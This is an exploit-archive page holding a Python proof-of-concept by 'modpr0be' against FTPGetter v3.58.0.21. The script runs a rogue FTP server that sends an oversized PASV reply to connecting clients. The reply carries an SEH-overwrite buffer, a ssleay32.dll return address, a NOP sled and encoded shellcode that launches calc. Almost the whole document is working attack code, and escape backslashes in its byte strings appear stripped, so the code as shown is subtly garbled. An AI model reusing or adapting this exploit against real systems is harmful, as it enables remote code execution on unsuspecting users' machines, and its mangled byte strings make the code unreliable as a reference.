FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit
# Published : 2011-02-03
# Author : modpr0be
# Previous Title : Majordomo2 - Directory Traversal (SMTP/HTTP)
# Next Title : Tandberg E, EX and C Series Endpoints Default Credentials for Root Account
#!/usr/bin/python

# Exploit Title: FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit
# Date: 02/03/2011
# Author: modpr0be
# Software Link: http://www.ftpgetter.com/ftpgetter_setup.exe
# Vulnerable version: <= 3.58.0.21
# Tested on: Windows XP SP3 (VMware Player 3.1.3 build-324285)
# CVE : N/A

# ======================================================================
#        ___       _ __        __            __    _     __
#   ____/ (_)___ _(_) /_____ _/ / ___  _____/ /_  (_)___/ /___  ____ _
#  / __  / / __ `/ / __/ __ `/ / / _ / ___/ __ / / __  / __ / __ `/
# / /_/ / / /_/ / / /_/ /_/ / / /  __/ /__/ / / / / /_/ / / / / /_/ /
# __,_/_/__, /_/__/__,_/_/  ___/___/_/ /_/_/__,_/_/ /_/__,_/
#        /____/                          http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
#   say hello to all digital-echidna org crew:
#     otoy, cipherstring, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
#   special thx:
#     otoy, cipherstring, cyb3r.anbu, oebaj.
#   help for documentation:   	
#     offsec, exploit-db, corelan-team, 5M7X, loneferret.
#

#### Software description:
# Save time on FTP/SFTP updates! Plan your uploads and automate the workflow. 
# Schedule and automate file transfers with a centralized console. Let your 
# computer move or synchronize information securely between home and office 
# automatically according to the schedule!
#
#### Exploit information:
# There was an error when sending a response to the PASV command. 
# Fortunately, these errors lead to buffer overflows. 
# This exploit is unstable. It should only be used as a POC.
# I tried several times on various systems,  
# the buffer sometimes changed.
# 
### Some Conditions:
# This POC is using "the most selling feature" Automated FTP Request.
# So this POC, I use Auto Download with / as the Source Files.
# Scheduler Settings also set to Repetitive.
# Make sure to run the program first before this POC.
# 
#### Other information:
# It's a part of "Death of an FTP Client" :)
# For more information, loot at here:
# http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
#
##

from socket import *
import struct
import time

total = 1000
junk1 = "x41" * 485
nseh = "xebx06x90x90"
seh = struct.pack('<L', 0x1001A149) # ppr from ssleay32.dll
nops = "x90" * 8

# msfpayload windows/exec CMD=calc R | msfencode -t c 
# [*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)
# BadChars x00xffx0dx5cx2fx0a

shellcode = (
"xdbxd1xd9x74x24xf4x5ax31xc9xb1x32xb8xcaxeaxc0"
"x1fx31x42x17x83xc2x04x03x88xf9x22xeaxf0x16x2b"
"x15x08xe7x4cx9fxedxd6x5exfbx66x4ax6fx8fx2ax67"
"x04xddxdexfcx68xcaxd1xb5xc7x2cxdcx46xe6xf0xb2"
"x85x68x8dxc8xd9x4axacx03x2cx8axe9x79xdfxdexa2"
"xf6x72xcfxc7x4ax4fxeex07xc1xefx88x22x15x9bx22"
"x2cx45x34x38x66x7dx3ex66x57x7cx93x74xabx37x98"
"x4fx5fxc6x48x9exa0xf9xb4x4dx9fx36x39x8fxe7xf0"
"xa2xfax13x03x5exfdxe7x7ex84x88xf5xd8x4fx2axde"
"xd9x9cxadx95xd5x69xb9xf2xf9x6cx6ex89x05xe4x91"
"x5ex8cxbexb5x7axd5x65xd7xdbxb3xc8xe8x3cx1bxb4"
"x4cx36x89xa1xf7x15xc7x34x75x20xaex37x85x2bx80"
"x5fxb4xa0x4fx27x49x63x34xd7x03x2ex1cx70xcaxba"
"x1dx1dxedx10x61x18x6ex91x19xdfx6exd0x1cx9bx28"
"x08x6cxb4xdcx2exc3xb5xf4x4cx82x25x94x92")

junk2 = "x90" * (total - len(junk1+nseh+seh+nops+shellcode))
payload = junk1+nseh+seh+nops+shellcode+junk2

host = "0.0.0.0"
port = 21

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)

print "n[+] FTPGetter v3.58.0.21 Buffer Overflow POC"
print "[+] by modpr0be[at]digital-echidna[dot]org."
print "============================================="
print "[+] Evil FTP Server Started."
print "[+] Listening on %d ..." % port

cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
print "[+] Whatever for username and password."

def hajar():
	welcome = "220 Welcome to EvilFTP Serverrn"
	cl.send(welcome)
	cl.recv(1024)
	cl.send("331 User name okay, need passwordrn")	# received USER
	cl.recv(1024)
	cl.send("230-Password acceptedrn")		# received PASS
	cl.send("230 User logged in.rn")
	cl.recv(1024)
	cl.send("215 UNIX Type: L8rn")   # received from SYST
	cl.recv(1024)
	cl.send("200 Type set to Irn")	# received from TYPE I
	cl.recv(1024)
	cl.send("200 OKrn")			# received from REST 0
	cl.recv(1024)
	cl.send("200 Command not Understoodrn")	# received from OPTS UTF8 OFF
	cl.recv(1024)
	cl.send("257 "/" is current directoryrn")	# received from PWD
	cl.recv(1024)
	cl.send("250 CWD Command successful.rn")
	cl.recv(1024)
	cl.send("257 "/" is current directoryrn")	# received from PWD
	cl.recv(1024)
	cl.send("200 Type set to Irn")	# received from TYPE I
	cl.recv(1024)
	print "[+] Begin sending evil passive mode.."
	cl.send("227 Entering Passive Mode ("+payload+",1,1,1,1,1)rn")	# this is the junk from passive mode
	cl.recv(1024)
	cl.close() 

hajar()
time.sleep(3)
print "[+] Skadush! Calculator will pop out..rn" 

s.close()